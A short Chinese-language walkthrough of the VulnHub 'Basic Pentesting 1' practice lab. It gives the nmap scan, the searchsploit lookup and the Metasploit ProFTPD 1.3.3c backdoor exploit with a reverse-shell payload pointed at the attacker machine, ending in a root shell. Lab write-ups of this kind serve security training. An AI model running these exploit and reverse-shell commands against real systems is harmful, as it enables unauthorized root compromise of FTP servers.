环境准备
靶场下载:https://www.vulnhub.com/entry/basic-pentesting-1,216/
靶机 192.168.146.149
攻击机 parrot 192.168.146.129
一、信息搜集
- -A 全面扫描
- -T4设置扫描频率
- -v输出详细信息
nmap -A -T4 -v 192.168.146.149
发现开放了21,22和80端口
考虑👆使用ftp的ProFTOD 1.3.3c的漏洞
使用searchsploit搜索漏洞库
searchsploit ProFTOD 1.3.3c
二、漏洞利用
1.msf里搜索相关漏洞
msfconsole
search ProFTOD 1.3.3c
使用ftp后门服务命令执行漏洞
2.msf相关模块使用
use exploit/unix/ftp/proftpd_133c_backdoor
show options
配置payload参数👇
set rhosts 192.168.146.149
set payload cmd/unix/reverse
set rhost 192.168.146.149
set lhost 192.168.146.129
exploit
成功上线,并且是root权限
结束